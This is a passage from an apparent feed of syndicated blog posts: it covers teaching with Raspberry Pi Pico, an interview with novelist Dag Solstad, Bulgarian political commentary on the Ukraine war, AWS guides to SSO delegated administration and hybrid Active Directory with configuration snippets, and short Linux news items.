Another teacher from a school in Hampshire used Picos at an after-school club with students aged 13 to 15. After about six sessions of less than 50 minutes last term, the students have almost finished building motorised buggies. The first two sessions were spent familiarising students with the Picos, making LEDs flash, and using sensors. In the next four sessions, the students made their way through the Pico-focused physical computing unit from our Teach Computing Curriculum. The students worked in pairs, and initially some learners had trouble getting the motors to turn the wheels on their buggies. Rather than giving them the correct code, the teacher gave them duplicate sets of the hardware and suggested that they test each piece in turn to ‘debug’ the hardware. Thus the students quickly worked out what they needed to do to make the wheels turn.

A soldered Raspberry Pi Pico on a breadboard.

For non-formal learning settings such as computing and coding clubs, we’ve just released a six-project learning path called ‘Introduction to Raspberry Pi Pico’ for beginner digital makers. You can check out the path directly, or learn more about how we’ve designed it to encourage learners’ independence.

Reinforcing existing computing skills

Another key theme that came through in my conversations with teachers was how Raspberry Pi Pico can be used to reinforce learners’ existing computing skills. One teacher I interviewed, from a school in Essex, has been using Picos to teach computing to 12- to 14-year-olds in class, and talked about the potential for physical computing as a pedagogical tool for recapping topics that have been covered before. “If [physical computing] is taught well, it enhances students’ understanding of programming. If they just copy code from the board, it becomes about the kit and not how you solve a problem, it’s not as effective at helping them develop their computational thinking. Teaching Python on Pico really can strengthen existing understanding of using Python libraries and subroutines, as well as passing subroutine arguments.”

“If [physical computing] is taught well, it enhances students’ understanding of programming.”

Teacher at an Essex secondary school

Another teacher I spoke to, working at a Waterlooville school and relatively new to teaching, talked about the benefits of using Pico to teach Python: “It takes some of the anxiety away from computing for some of the younger students and makes them more resilient. They can be wary of making mistakes, and see them as a hurdle, but working towards a tangible output can help some students to see the value of learning through their mistakes.”

Raspberry Pi Pico attached with jumper wires to a purple LED.

This teacher was keen for his students to get a sense of the variety of jobs that are available in the computing sector, and not just in software. He explained how physical computing can demonstrate to students how you can make inputs, outputs, and processing very real: “Give students a Pico and make them thirsty about what they could do with it — the device allows them to interact with it and work out how to bend it to what they want to do. You can be creative in computing without just writing code, you can capture information and output it again in a more useful way.”

“Working towards a tangible output can help some students to see the value of learning through their mistakes.”

Teacher at a Waterlooville school

One of the teachers we spoke to was initially a bit cynical about Pico, but had a much better experience of using it in the classroom than expected: “It’s not such a big progression from block-based microcontrollers to Pico — it could be a good stepping stone between, for example, a micro:bit and a Raspberry Pi computer.”

Why not try out Raspberry Pi Pico in your classroom or club? It might be the engagement booster you’ve been looking for!  

Top teacher tips for activities with Raspberry Pi Pico

  • Prepare to install Thonny (the software we recommend to program Pico) on your school’s or venue’s IT systems, and ask your IT technician for support.
  • It takes time to unpack devices, connect them, and pack them back up again. Build this time into your plan!

Free learning resources for using Raspberry Pi Pico in your classroom or club

Teachers at state schools in England can borrow physical computing kits with class sets of Raspberry Pi Picos from their local Computing Hub. We’ve made these kits available through our work as part of the National Centre for Computing Education. The Pico kit is perfect for teaching the Pico-focused physical computing unit from our Teach Computing Curriculum.

Qualified US-based educators can still get their hands on 1 of 1000 free Raspberry Pi Pico hardware kits if they sign up to our free course Design, build, and code a rover with Raspberry Pi Pico. This course shows you how to introduce Pico in your classroom. We’ve designed the course on the Pathfinders Online Institute platform, specifically for US-based educators, thanks to our partners at Infosys Foundation USA. These Raspberry Pi Pico kits are also available at PiShop.us.

For non-formal learning settings, such as Code Clubs and CoderDojos, we’ve created a six-project learning path: ‘Introduction to Raspberry Pi Pico’. This path is for beginner digital makers to follow and create Pico projects, all the while learning the skills to independently design, code, and build their own projects. All of the components for the path are available as a kit from Pimoroni.

The post Teaching with Raspberry Pi Pico in the computing classroom appeared first on Raspberry Pi.

T. Singer, the anonymous loner. An unpublished interview by Marin Bodakov with Dag Solstad

Post Syndicated from Marin Bodakov original https://toest.bg/dag-solstad-interview/

This interview could have had a continuation…

These are the opening words of the letter that Darya Haralanova from the Aquarius publishing house sent us. Attached to it was an interview that Marin Bodakov was preparing for Toest exactly one year ago, but which never reached the editorial office. Here is why:

At the beginning of 2021, right after we published Dag Solstad’s T. Singer, Marin contacted me and asked me to leave a copy for him in our usual “mailbox” – the Balgarski Knizhitsi bookshop in Sofia. Solstad (b. 1941) is a multiple-award-winning Norwegian novelist, essayist, and playwright, the author of more than 30 books, but until now he had never appeared in Bulgarian. Marin wanted to include T. Singer in his column “Po bukvite”.

Soon after reading the novel, however, Marin asked me to find out whether Dag Solstad would agree to an interview. Since he could only be reached through his literary agency, we had to wait. On top of everything, the 80-year-old Solstad does not use email, so the agency had to print Marin’s questions on paper, send them to the writer by regular mail, wait for the answers to come back the same way, type them up, and send them back to us.

I received the answers at the beginning of October, a month after Marin suddenly passed away. I have kept this file on my computer ever since…

And so the long-distance conversation between Marin Bodakov and Dag Solstad has finally reached us, thanks to the efforts of literary agents and publishers, the internet, and the Norwegian postal service. Enjoy it – and next Saturday, May 21, look for Stefan Ivanov’s review of the novel T. Singer in our book column “Na vtoro chetene” (“On Second Reading”).

Which characters in European literature is your protagonist Singer kin to?

I haven’t thought about that. Nor do I want to. But I have said many times, in interviews and elsewhere, that my books should smell of literature, not of lived life. In other words, my books are fiction; they are invented, invented by me. Which means that all the novels I have read in my life may surface in my work in the form of acquired experience.

At the beginning of the novel you very carefully examine guilt and shame as the engines of Singer’s life choices. What would literature have lost if we had described the story of your hero/antihero in psychiatric terms – as panic attacks or intrusive memories?

I see nothing wrong with such a reading. The reader is permitted everything, even to go against the writer’s intent. But in this case I would rather not take a position. I avoid reading about it – which is not hard, given how deaf I have grown with time and how many things my old age spares me; and I never go on the internet at all.

Is Singer not following Epicurus’s advice to “live unnoticed”? Can a person be happy today if they choose obscurity?

I would not call Singer happy, but he himself has chosen to lead the life he leads and values so highly, even though it is an impossible and untenable life. I suspect that most sensible people today would judge his existence exactly that way – or at least the sensible people of the year 2000, when the end of the novel takes place.

Where does joy disappear from Singer’s everyday life? And why?

I don’t know exactly when happiness disappears from Singer’s life, because he has never felt happy, except perhaps at the very beginning of his marriage to Merete Sæthre; but then she dies in a car accident, at a time when their marriage had already begun to fall apart and the two had decided to divorce. And yet she dies, and Singer is left alone with Merete Sæthre’s little daughter, Isabella, in the terraced house in Notodden. His decision to raise Isabella as his own child is a turning point in the novel. By then his happiness has already left him, but that is the moment of the decisive turn in his life.

Help the reader: how should we interpret Singer’s renunciation of writing in favor of librarianship? Is that a question of fear, or a question of courage?

The young Singer dreams of becoming a writer, just like me. But unlike me, he does not succeed. He enrolls in library school at around 28, graduates at around 30 or 31, and immediately afterwards is hired at the library in Notodden. We can say with good reason that he gives up, that he has suffered a serious defeat – not so unusual for a young man. But like most of us, he picks himself up and makes the most of his defeat, and not without a certain cheerfulness, despite the melancholy temperament that never leaves him and in which he is akin to me. Whether his decision is born of fear or of courage, I would not venture to say.

Judging by Singer’s experience, is there any point in a person getting to know themselves at all?

Singer knows himself well; he has a penetrating view of his own actions and their causes. Is there any point in knowing oneself? Strictly speaking, I don’t know, but for Singer self-knowledge matters, because it allows him to live decently. He takes responsibility for his late wife’s little daughter, leaves Notodden with her, and begins an anonymous existence in the capital, Oslo. In the end, for a melancholy man who sees no fundamental meaning in existence, isn’t that precisely what the idea of a decent life, filled with responsible actions, comes down to?

What of yourself did you build into Singer?

Singer is an indelible part of my DNA, of my genes. He connects me with many of my ancestors, especially with one of my uncles, but also with my father. I originally intended to title the novel “Child of God”, but in 1999–2000 that title seemed too forceful to me. Perhaps I should have carried out my original intention after all; in any case, that title would have been accurate. “T. Singer” is more successful. Although “Child of God” is different and more memorable, I am glad I chose “T. Singer”. It preserves the complexity of the novel in a more anonymous way.

Translated from the Norwegian by Stefka Kozhuharova

Cover illustration: a fragment of the cover of the Bulgarian edition of T. Singer, designed by Rositsa Raleva

Source

The war in Ukraine has pulled Bulgaria out of hibernation

Post Syndicated from Emilia Milcheva original https://toest.bg/voynata-v-ukrayna-izvadi-bulgariya-ot-hibernatsiyata/

Bulgaria will become a member of the European Union and NATO in 2022. That’s right, no mistake. The Bulgarian state spent all 15 years since joining the European community, and 18 years since its admission to the Alliance, in a state of hibernation. It absorbed EU funds in installments – through webs of companies created for the purpose – and imitated rearmament through overpriced contracts for military equipment, arranged so that Russian hardware would remain in service. By and large, it built itself the image of a consumer of the direct benefits of the two treaties, a passive and unreliable partner and ally.

The war in Ukraine has forcibly pulled Bulgaria’s rulers out of hibernation, compelling them not merely to pick a team but to play on it. The government of the four-party coalition was not ready for the harsh reality – the blows from outside and from within. Problems whose solutions had never been systematically and purposefully pursued came onto the agenda: energy diversification; the combat readiness of the Bulgarian army; the campaign around the eurozone (with accession planned for January 1, 2024); Russian hybrid warfare as a national and European threat. Here too is the issue of the Bulgarian veto on North Macedonia, with the red lines drawn earlier in the 2017 Treaty of Good Neighborliness and the mistake of leaving the matter “as a concession” to VMRO.

Russian aggression in Ukraine has forced those in power to seek solutions to at least some of the problems, and the solutions must be of two kinds – urgent and long-term. These processes are complicated by the constant protests of various sectors – hauliers, road builders, restaurant owners, police officers, nurses, local communities – as well as by the rapid fall in trust in the government as early as the end of its first 100 days and by the rise in support for national conservatives with a pro-Putin bent. On top of that, the state institutions have been weakened for years and enjoy traditionally low trust, while the rule of law has been degraded, which eases the penetration of Russian propaganda given the weak national immunity.

The solutions, however, do not pass through reforms – not in the energy sector, not in security and defense, not in healthcare. By all appearances, the landmark judicial reform – one of the four parties’ stated reasons for governing together – has been stalled. The government acts like a man against the wall with a gun to his head: ready to promise everything to everyone. And the generous promisers are binding the state budget with their promises. A budget update is due in June, and Deputy Prime Minister and Finance Minister Asen Vassilev announced that a package of anti-crisis measures worth 1.5–2 billion leva is being prepared. As for the measures themselves, complete chaos reigns for now – on fuel discounts, on possible tax relief, on pension recalculation, and so on.

Energy diversification

The European Union, and therefore Bulgaria, is beginning its separation from Russian energy resources. How long the long goodbye will last is impossible to predict, regardless of the announced deadlines: ending deliveries of Russian natural gas by 2030, stopping imports of Russian coal from August of this year, and the intention to embargo Russian oil (thwarted for now). For the poorest country in the EU – more than 85% dependent on Russian gas, 70% on Russian oil, and 100% on Russian nuclear fuel – this is a heavy blow. The two operating units of the Kozloduy nuclear power plant are secured with fresh nuclear fuel for the next two to four years; diversification there begins with the gradual replacement of fuel assemblies with those of the American Westinghouse from mid-2024. The unsolved problem is the lack of a “graveyard” for the geological burial of the vitrified waste that Russia is supposed to return to us.

Gazprom’s halt of Russian gas deliveries to Poland and Bulgaria in April – over the countries’ refusal to pay in rubles – confronted the government with the need, first, to urgently secure supplies through the end of the year and, second, to prepare a package of decisions guaranteeing gas supply in the long term. In the short term, the way out is liquefied natural gas and Azeri gas, which, however, will arrive in full volume only at the end of the year, the realistic deadline for putting the interconnector with Greece into commercial operation. The government announced that during his visit to the US, Prime Minister Kiril Petkov negotiated “real deliveries of liquefied natural gas to Bulgaria at prices below Gazprom’s, to begin in June”. Most recently, Russian gas prices for Bulgaria exceeded $1,000 per 1,000 cubic meters.

But whatever the prices of the new supplies, they will be paid. The storage facility in Chiren, now almost empty, must be filled before the start of the heating season, and the district heating companies, industry, bakeries, the 150,000 household subscribers, and the gasified municipalities must keep receiving the fuel. The situation will somehow be patched up; the question is how quantities will be contracted in the long term. The contract with Azerbaijan for deliveries of 1 billion cubic meters runs for 25 years, until 2045, and covers one third of Bulgarian consumption. Where the remaining 2 billion cubic meters will come from is a matter of negotiations starting now, but also of political will in a coalition in which one of the partners – the BSP – considers Russia a “friendly state”. (Never mind that Bulgaria is on the Kremlin’s list of unfriendly countries!)

Parting with Russian oil will be considerably harder, not least because of Deputy Prime Minister Vassilev’s already announced intention to veto the European decision on an embargo. At its root is Lukoil’s dominant position on the fuel market and among tax warehouses, and its role as the main supplier of the state reserve, combined with the government’s fear that fuels will become significantly more expensive, which would ignite new protests – and inflation.

An ally in NATO

The much-touted Bulgarian battalion championed by both President Rumen Radev and the dismissed defense minister and former presidential adviser Stefan Yanev turned out to be multinational. American, British, and Italian troops are joining it – 150 from the United Kingdom and as many from the US. Spanish fighter jets arrived to guard the Bulgarian sky. What did Bulgaria do as a partner? Nothing, apart from declarative statements against the aggressor and in support of Ukraine. There were even proposals for “full neutrality” (the loudest voices again coming from the BSP and Vazrazhdane) regarding not merely a war the Russian aggressor is waging for territory, but a war against the international legal order and European values.

Bulgaria’s supreme authority – which in a parliamentary democracy is the National Assembly – did not even have the nerve to vote to send military aid to Ukraine and thus unambiguously take the position already expressed by the other EU member states (except Hungary). The result was military-technical assistance, and specifically itemized at that: repairs of military equipment, if and when Ukraine asks.

In years past, for that matter, the Bulgarian army seemed more active. The mission in Afghanistan, for instance, began even before NATO membership, in 2002, when the Bulgarian military contingent joined the International Security Assistance Force, and after 2005 continued as part of NATO’s Resolute Support operation. As for the American operation in Iraq in 2003, the NDSV–DPS government declared shortly beforehand that it would act as a “de facto NATO member”. And just like British Prime Minister Tony Blair – in the name of the “special relationship” with the US – it joined an invasion whose start was justified with a lie: that Saddam Hussein’s regime was building weapons of mass destruction.

How the current government resolves the fundamental question – is Bulgaria a partner in the EU and NATO, or a crouching bystander – will determine what comes next. If it intends to let fear and Kornelia Ninova dictate terms, the four had better split up right now. Voters might well appreciate that courage. The argument that resignation would open the way for Stefan Yanev’s Bulgarian Rise and Kostadin Kostadinov’s Vazrazhdane does not hold if what is on offer is appeasement in the name of more of the same.

Emerging from hibernation will be painful. Bulgaria – integrated with the West, its children choosing to study in the West, its brains draining to the West, its migrant workers going to work in the West – is still waiting for chorbadzhi Marko to gather the family for dinner and for chorbadzhi Micho Beyzadeto to bang on the table insisting that Russia cannot be defeated. It is time to come out of hibernation – this is the 21st century.

Cover photo: © Press Office of the Council of Ministers

Source

Getting started with AWS SSO delegated administration

Post Syndicated from Chris Mercer original https://aws.amazon.com/blogs/security/getting-started-with-aws-sso-delegated-administration/

Recently, AWS launched the ability to delegate administration of AWS Single Sign-On (AWS SSO) in your AWS Organizations organization to a member account (an account other than the management account). This post will show you a practical approach to using this new feature. For the documentation for this feature, see Delegated administration in the AWS Single Sign-On User Guide.

With AWS Organizations, your enterprise organization can manage your accounts more securely and at scale. One of the benefits of Organizations is that it integrates with many other AWS services, so you can centrally manage accounts and how the services in those accounts can be used.

AWS SSO is where you can create, or connect, your workforce identities in AWS just once, and then manage access centrally across your AWS organization. You can create user identities directly in AWS SSO, or you can bring them from your Microsoft Active Directory or a standards-based identity provider, such as Okta Universal Directory or Azure AD. With AWS SSO, you get a unified administration experience to define, customize, and assign fine-grained access.

By default, the management account in an AWS organization has the power and authority to manage member accounts in the organization. Because of these additional permissions, it is important to exercise least privilege and tightly control access to the management account. AWS recommends that enterprises create one or more accounts specifically designated for security of the organization, with proper controls and access management policies in place. AWS provides a method in which many services can be administered for the organization from a member account; this is usually referred to as a delegated administrator account. These accounts can reside in a security organizational unit (OU), where administrators can enforce organizational policies. Figure 1 is an example of a recommended set of OUs in Organizations.

Figure 1: Recommended AWS Organizations OUs

Many AWS services support this delegated administrator model, including Amazon GuardDuty, AWS Security Hub, and Amazon Macie. For an up-to-date complete list, see AWS services that you can use with AWS Organizations. AWS SSO is now the most recent addition to the list of services in which you can delegate administration of your users, groups, and permissions, including third-party applications, to a member account of your organization.

How to configure a delegated administrator account

In this scenario, your enterprise AnyCompany has an organization consisting of a management account, an account for managing security, as well as a few member accounts. You have enabled AWS SSO in the organization, but you want to enable the security team to manage permissions for accounts and roles in the organization. AnyCompany doesn’t want you to give the security team access to the management account, and they also want to make sure the security team can’t delete the AWS SSO configuration or manage access to that account, so you decide to delegate the administration of AWS SSO to the security account.

Note: There are a few things to consider when making this change, which you should review before you enable delegated administration. These items are covered in the console during the process, and are described in the section Considerations when delegating AWS SSO administration in this post.

To delegate AWS SSO administration to a security account

  1. In the AWS Organizations console, log in to the management account with a user or role that has permission to use organizations:RegisterDelegatedAdministrator, as well as AWS SSO management permissions.
  2. In the AWS SSO console, navigate to the Region in which AWS SSO is enabled.
  3. Choose Settings on the left navigation pane, and then choose the Management tab on the right side.
  4. Under Delegated administrator, choose Register account, as shown in Figure 2.
    Figure 2: The Register account button in AWS SSO

  5. Consider the implications of designating a delegated administrator account (as described in the section Considerations when delegating AWS SSO administration). Select the account you want to be able to manage AWS SSO, and then choose Register account, as shown in Figure 3.
    Figure 3: Choosing a delegated administrator account in AWS SSO

You should see a success message to indicate that the AWS SSO delegated administrator account is now setup.
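
If you prefer to script this step, the same registration can be performed with the AWS SDK, run with credentials from the management account. The sketch below uses the AWS SDK for JavaScript v3; the sso.amazonaws.com service principal is an assumption to verify against the AWS SSO documentation, and the account ID is a placeholder.

  import {
    OrganizationsClient,
    RegisterDelegatedAdministratorCommand,
  } from "@aws-sdk/client-organizations";

  const client = new OrganizationsClient({ region: "us-east-1" });

  async function delegateSsoAdmin(): Promise<void> {
    await client.send(
      new RegisterDelegatedAdministratorCommand({
        AccountId: "111122223333",             // the security account
        ServicePrincipal: "sso.amazonaws.com", // AWS SSO service principal (assumed)
      })
    );
    console.log("Delegated AWS SSO administration registered");
  }

  delegateSsoAdmin().catch(console.error);

Deregistration (described next) works the same way with the corresponding DeregisterDelegatedAdministratorCommand.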

To remove delegated AWS SSO administration from an account

  1. In the AWS Organizations console, log in to the management account with a user or role that has permission to use organizations:DeregisterDelegatedAdministrator.
  2. In the AWS SSO console, navigate to the Region in which AWS SSO is enabled.
  3. Choose Settings on the left navigation pane, and then choose the Management tab on the right side.
  4. Under Delegated administrator, select Deregister account, as shown in Figure 4.
    Figure 4: The Deregister account button in AWS SSO

  5. Consider the implications of removing a delegated administrator account (as described in the section Considerations when delegating AWS SSO administration), then enter the account name that is currently administering AWS SSO, and choose Deregister account, as shown in Figure 5.
    Figure 5: Considerations of deregistering a delegated administrator in AWS SSO

Considerations when delegating AWS SSO administration

There are a few considerations you should keep in mind when you delegate AWS SSO administration. The first consideration is that the delegated administrator account will not be able to perform the following actions:

  • Delete the AWS SSO configuration.
  • Delegate (to other accounts) administration of AWS SSO.
  • Manage user or group access to the management account.
  • Manage permission sets that are provisioned (have a user or group assigned) in the organization management account.

For examples of those last two actions, consider the following scenarios:

In the first scenario, you are managing AWS SSO from the delegated administrator account. You would like to give your colleague Saanvi access to all the accounts in the organization, including the management account. This action would not be allowed, since the delegated administrator account cannot manage access to the management account. You would need to log in to the management account (with a user or role that has proper permissions) to provision that access.

In a second scenario, you would like to change the permissions Paulo has in the management account by modifying the policy attached to a ManagementAccountAdmin permission set, which Paulo currently has access to. In this scenario, you would also have to do this from inside the management account, since the delegated administrator account does not have permissions to modify the permission set, because it is provisioned to a user in the management account.

With those caveats in mind, users with proper access in the delegated administrator account will be able to control permissions and assignments for users and groups throughout the AWS organization. For more information about limiting that control, see Allow a user to administer AWS SSO for specific accounts in the AWS Single Sign-On User Guide.

Deregistering an AWS SSO delegated administrator account will not affect any permissions or assignments in AWS SSO, but it will remove the ability for users in the delegated account to manage AWS SSO from that account.

Additional considerations if you use Microsoft Active Directory

There are additional considerations for you to keep in mind if you use Microsoft Active Directory (AD) as an identity provider, specifically if you use AWS SSO configurable AD sync, and which AWS account the directory resides in. In order to use AWS SSO delegated administration when the identity source is set to Active Directory, AWS SSO configurable AD sync must be enabled for the directory. Your organization’s administrators must synchronize Active Directory users and groups you want to grant access to into an AWS SSO identity store. When you enable AWS SSO configurable AD sync, a new feature that launched in April, Active Directory administrators can choose which users and groups get synced into AWS SSO, similar to how other external identity providers work today when using the System for Cross-domain Identity Management (SCIM) v2.0 protocol. This way, AWS SSO knows about users and groups even before they are granted access to specific accounts or roles, and AWS SSO administrators don’t have to manually search for them.

Another thing to consider when delegating AWS SSO administration when using AD as an identity source is where your directory resides, that is which AWS account owns the directory. If you decide to change the AWS SSO identity source from any other source to Active Directory, or change it from Active Directory to any other source, then the directory must reside in (be owned by) the account that the change is being performed in. For example, if you are currently signed in to the management account, you can only change the identity source to or from directories that reside in (are owned by) the management account. For more information, see Manage your identity source in the AWS Single Sign-On User Guide.

Best practices for managing AWS SSO with delegated administration

AWS recommends the following best practices when using delegated administration for AWS SSO:

  • Maintain separate permission sets for use in the organization management account (versus the rest of the accounts). This way, permissions can be kept separate and managed from within the management account without causing confusion among the delegated administrators.
  • When granting access to the organization management account, grant the access to groups (and permission sets) specifically for access in that account. This helps enable the principle of least privilege for this important account, and helps ensure that AWS SSO delegated administrators are able to manage the rest of the organization as efficiently as possible (by reducing the number of users, groups, and permission sets that are off limits to them).
  • If you plan on using one of the AWS Directory Services for Microsoft Active Directory (AWS Managed Microsoft AD or AD Connector) as your AWS SSO identity source, locate the directory and the AWS SSO delegated administrator account in the same AWS account.

Conclusion

In this post, you learned about a helpful new feature of AWS SSO, the ability to delegate administration of your users and permissions to a member account of your organization. AWS recommends as a best practice that the management account of an AWS organization be secured by a least privilege access model, in which as few people as possible have access to the account. You can enable delegated administration for supported AWS services, including AWS SSO, as a useful tool to help your organization minimize access to the management account by moving that control into an AWS account designated specifically for security or identity services. We encourage you to consider AWS SSO delegated administration for administrating access in AWS. To learn more about the new feature, see Delegated administration in the AWS Single Sign-On User Guide.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS IAM forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Chris Mercer

Chris is a security specialist solutions architect. He helps AWS customers implement sophisticated, scalable, and secure solutions to business challenges. He has experience in penetration testing, security architecture, and running military IT systems and networks. Chris holds a Master’s Degree in Cybersecurity, several AWS certifications, OSCP, and CISSP. Outside of AWS, he is a professor, student pilot, and Cub Scout leader.

Red Hat Enterprise Linux 9 released

Post Syndicated from original https://lwn.net/Articles/894869/

On May 10, Red Hat announced the release of Red Hat Enterprise Linux 9 (RHEL 9). Not surprisingly, the announcement is rather buzzword-heavy and full of marketing, though there are some technical details scattered in it. The release notes for the RHEL 9 beta are available, which have a lot more information. “The platform will be generally available in the coming weeks.

Building on decades of relentless innovation, the latest version of the world’s leading enterprise Linux platform is the first production release built from CentOS Stream, the continuously delivered Linux distribution that tracks just ahead of Red Hat Enterprise Linux. This approach helps the broader Red Hat Enterprise Linux ecosystem, from partners to customers to independent users, provide feedback, code and feature updates to the world’s leading enterprise Linux platform.”

NVIDIA Transitioning To Official, Open-Source Linux GPU Kernel Driver (Phoronix)

Post Syndicated from original https://lwn.net/Articles/894861/

Phoronix reports that the days of proprietary NVIDIA graphics drivers are coming to a close.

NVIDIA’s open kernel modules is already considered “production ready, opt-in” for data center GPUs. For GeForce and workstation GPUs, the open kernel module code is considered “alpha quality” but will be ramped up moving forward with future releases. NVIDIA has already deprecated the monolithic kernel module approach for their data center GPU support to focus on this open kernel driver solution (and their existing proprietary kernel module using the GSP). Only Turing and newer GPUs will be supported by this open-source kernel driver. Pre-Turing GPUs are left to using the existing proprietary kernel drivers or the Nouveau DRM driver for that matter.

The user-space code remains proprietary, though, which could inhibit the eventual merging of this code into the mainline kernel.

Update: here is NVIDIA’s press release on the new drivers.

[$] Changing filesystem resize patterns

Post Syndicated from original https://lwn.net/Articles/894629/

In a filesystem session at the 2022 Linux Storage, Filesystem, Memory-management and BPF Summit (LSFMM), Ted Ts’o brought up the subject of filesystems that get resized frequently and whether the default parameters for filesystem creation should change as a result. It stems from a conversation that he had with XFS developer Darrick Wong, who is experiencing some of the same challenges as ext4 in this area. He outlined the problem and how it comes about, then led the discussion on ways to perhaps address it.

Running hybrid Active Directory service with AWS Managed Microsoft Active Directory

Post Syndicated from Lewis Tang original https://aws.amazon.com/blogs/architecture/running-hybrid-active-directory-service-with-aws-managed-microsoft-active-directory/

Enterprise customers often need to architect a hybrid Active Directory solution to support running applications in existing on-premises corporate data centers and in the AWS cloud. There are many reasons for this, such as maintaining integration with on-premises legacy applications, keeping control of infrastructure resources, and meeting specific industry compliance requirements.

To extend on-premises Active Directory environments to AWS, some customers choose to deploy Active Directory service on self-managed Amazon Elastic Compute Cloud (EC2) instances after setting up connectivity between both environments. This setup works, but it also presents management and operational challenges: EC2 instance management, Windows operating system patching, and Active Directory service patching and backup all remain your responsibility. This is where AWS Directory Service for Microsoft Active Directory (AWS Managed Microsoft AD) helps.

Benefits of using AWS Managed Microsoft AD

With AWS Managed Microsoft AD, you can launch an AWS-managed directory in the cloud, leveraging the scalability and high availability of an enterprise directory service while adding seamless integration with other AWS services.

In addition, you can still access AWS Managed Microsoft AD using existing administrative tools and techniques, such as delegating administrative permissions to select groups in your organization. The full list of permissions that can be delegated is described in the AWS Directory Service Administration Guide.

Active Directory service design considerations with a single AWS account

Single region

A single AWS account is where the journey begins: a simple use case might be when you need to deploy a new solution in the cloud from scratch (Figure 1).

Figure 1. A single AWS account and single-region model

In a single AWS account and single-region model, the on-premises Active Directory has the “company.com” domain configured in the on-premises data center. AWS Managed Microsoft AD is set up across two availability zones in the AWS region for high availability and has a single domain, “na.company.com”, configured. The on-premises Active Directory is configured to trust the AWS Managed Microsoft AD directory, with network connectivity via AWS Direct Connect or VPN. Active-Directory–aware applications running on EC2 instances join the na.company.com domain, as do selected AWS managed services (for example, Amazon Relational Database Service for SQL Server).
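
The trust itself can be scripted. What follows is a minimal boto3 sketch of establishing a two-way forest trust from the managed directory to the on-premises domain; the directory ID, trust password, and conditional-forwarder IPs are hypothetical placeholders, not values from this post.

    import boto3

    ds = boto3.client("ds")

    # Hypothetical IDs -- replace with your directory ID, on-premises
    # domain, and the IPs of your on-premises DNS servers.
    response = ds.create_trust(
        DirectoryId="d-1234567890",           # AWS Managed Microsoft AD
        RemoteDomainName="company.com",       # on-premises forest
        TrustPassword="use-a-strong-secret",  # must match the password set on-premises
        TrustDirection="Two-Way",
        TrustType="Forest",
        ConditionalForwarderIpAddrs=["10.1.1.10", "10.1.1.11"],
    )
    print(response["TrustId"])

Note that the matching trust must also be created and confirmed on the on-premises side; the API call only configures the AWS end.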

Multi-region

As your cloud footprint expands to more AWS regions, you also have two options to expand AWS Managed Microsoft AD, depending on which edition of AWS Managed Microsoft AD you use (Figure 2):

  1. With AWS Managed Microsoft AD Enterprise Edition, you can turn on the multi-region replication feature to automatically configure inter-region network connectivity, deploy domain controllers, and replicate all the Active Directory data across multiple regions (a minimal API sketch follows Figure 2). This ensures that Active-Directory–aware workloads residing in those regions can connect to and use AWS Managed Microsoft AD with low latency and high performance.
  2. With AWS Managed Microsoft AD Standard Edition, you need to create independent AWS Managed Microsoft AD directories per region. In Figure 2, the “eu.company.com” domain is added, and AWS Transit Gateway routes traffic among Active-Directory–aware applications across the two AWS regions. The on-premises Active Directory is configured to trust each AWS Managed Microsoft AD directory, over either Direct Connect or VPN.

Figure 2. A single AWS account and multi-region model
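
For the Enterprise Edition path described in option 1, multi-region replication is driven by one API call per additional region. Below is a hedged boto3 sketch; the directory, VPC, and subnet IDs are placeholders.

    import boto3

    # Call the API in the directory's primary region.
    ds = boto3.client("ds", region_name="us-east-1")

    # Hypothetical IDs -- substitute your own directory plus a VPC and
    # two subnets (in different availability zones) in the new region.
    ds.add_region(
        DirectoryId="d-1234567890",
        RegionName="eu-west-1",
        VPCSettings={
            "VpcId": "vpc-0abc123def456",
            "SubnetIds": ["subnet-0aaa111", "subnet-0bbb222"],
        },
    )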

Active Directory service design considerations with multiple AWS accounts

Large organizations use multiple AWS accounts for administrative delegation and billing purposes. This is commonly implemented through the AWS Control Tower service or the AWS Landing Zone solution.

Single region

You can share a single AWS Managed Microsoft AD directory with multiple AWS accounts within one AWS region. This capability makes it simpler and more cost-effective to manage Active-Directory–aware workloads from a single directory across accounts and Amazon Virtual Private Clouds (VPCs). It also allows you to seamlessly join your Windows EC2 instances to AWS Managed Microsoft AD.

As a best practice, place AWS Managed Microsoft AD in a separate AWS account with limited administrator access, and share the directory with your other AWS accounts. After sharing the directory and configuring routing, Active-Directory–aware applications, such as Microsoft SharePoint, can seamlessly join Active Directory Domain Services while you retain control of all administrative tasks. Find more details on sharing AWS Managed Microsoft AD in the Share your AWS Managed AD directory tutorial.
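
Directory sharing can be automated as well. The sketch below, again with placeholder IDs, shares a directory with a consumer account using the handshake flow, which the consumer account must then accept.

    import boto3

    ds = boto3.client("ds")

    # Hypothetical IDs -- replace with your directory and consumer account.
    ds.share_directory(
        DirectoryId="d-1234567890",
        ShareMethod="HANDSHAKE",  # consumer must accept the invitation
        ShareTarget={"Id": "111122223333", "Type": "ACCOUNT"},
        ShareNotes="Shared AD for SharePoint workloads",
    )

    # In the consumer account, accept the invitation:
    #   ds.accept_shared_directory(SharedDirectoryId="d-...")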

Multi-region

With a multiple-account, multi-region model, we recommend using AWS Managed Microsoft AD Enterprise Edition. As shown in Figure 3, AWS Managed Microsoft AD Enterprise Edition supports automated multi-region replication in all AWS regions where AWS Managed Microsoft AD is available. With multi-region replication, Active-Directory–aware applications use the local directory for low latency and high performance while remaining multi-region for resiliency.

Figure 3. Multiple AWS accounts and multi-region model

Domain Name System resolution design

To enable Active-Directory–aware applications to communicate between your on-premises data centers and the AWS cloud, a reliable solution for Domain Name System (DNS) resolution is needed. You can point the Amazon VPC Dynamic Host Configuration Protocol (DHCP) option sets at either AWS Managed Microsoft AD or the on-premises Active Directory, then assign them to each VPC in which the required Active-Directory–aware applications reside. The full list of options that work with DHCP option sets is described in the Amazon Virtual Private Cloud User Guide.

The benefit of configuring DHCP option sets is that any EC2 instance in that VPC resolves domain names against the specified domain and DNS servers, removing the need for manual DNS configuration on each instance. However, because DHCP option sets cannot be shared across AWS accounts, a DHCP option set must also be created in each additional account. A hedged example follows Figure 4.

Figure 4. DHCP option sets
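
As a concrete illustration, here is a minimal boto3 sketch that creates a DHCP option set pointing at a managed directory's DNS servers and attaches it to a VPC. The domain name, server IPs, and VPC ID are placeholders; use your directory's actual DNS addresses as reported by the Directory Service console or API.

    import boto3

    ec2 = boto3.client("ec2")

    # Hypothetical values -- use your directory's domain name and its
    # DNS server addresses.
    options = ec2.create_dhcp_options(
        DhcpConfigurations=[
            {"Key": "domain-name", "Values": ["na.company.com"]},
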